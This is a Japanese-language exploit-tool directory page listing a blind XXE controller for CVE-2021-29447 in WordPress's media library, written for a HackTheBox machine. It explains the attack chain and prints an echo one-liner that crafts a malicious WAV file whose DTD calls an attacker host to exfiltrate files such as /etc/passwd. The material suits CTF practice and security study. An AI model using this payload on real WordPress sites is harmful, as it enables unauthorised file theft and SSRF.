Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
blind-xxe-controller-CVE-2021-29447 — 任意ファイル読み取りコントローラー(CVE-2021-29447 に基づく) | Kitploit
ツール/GitHubGitHub/elf1337/blind-xxe-controller-cve-2021-29447
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティCTF
GitHubelf1337/blind-xxe-controller-cve-2021-29447

blind-xxe-controller-CVE-2021-29447

任意ファイル読み取りコントローラー(CVE-2021-29447 に基づく)

リポジトリを見る
383年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ブラインドXXEコントローラー

このコントローラーは、HackTheBoxのmetatwoマシンでCVE-2021-29447を悪用するために作成しました。CVE-2021-29447は、メディアライブラリにおけるWordPressのXXE脆弱性で、バージョン5.7、5.6.2、5.6.1、5.6、5.0.11に影響します。メディアライブラリにアップロードできる認証済みユーザーが悪意のあるwavファイルをアップロードすると、リモートからの任意ファイル読み取りやサーバーサイドリクエストフォージェリ(SSRF)につながる可能性があります。

この脆弱性を悪用するには、攻撃を成功させるまでに複数のステップが必要です。解析されたiXMLメタデータはユーザーに返されないため、悪用するにはブラインドXXEペイロードが必要です。これは、攻撃者が制御する外部文書型定義(DTD)を含めることで実現でき、攻撃者のリスニングサーバーに接続を返すための悪意のあるwavファイルを作成する必要があります。これらのステップが完了したら、wavファイルをサーバーにアップロードし、ペイロードファイル(例:/etc/passwd)のbase64エンコードされた内容を含むHTTPリクエストを受信するのを待って、base64をデコードします。このコントローラーには、これらの複数のステップに対するすべてのソリューションが含まれています。コントローラーの**$console >**にファイル名を入力するだけです。

詳細ブログ https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/

注: このコントローラーはHTB metatwoマシン向けに完全に構成されています。外部で使用する場合は、スクリプトにいくつか変更を加える必要があります。

使用方法

payload.wav という名前のWAVEファイルを作成します

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:8000/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

main.py を実行します

python3 main.py listen_ip

POC画像

/poc/poc.png

ツールをダウンロード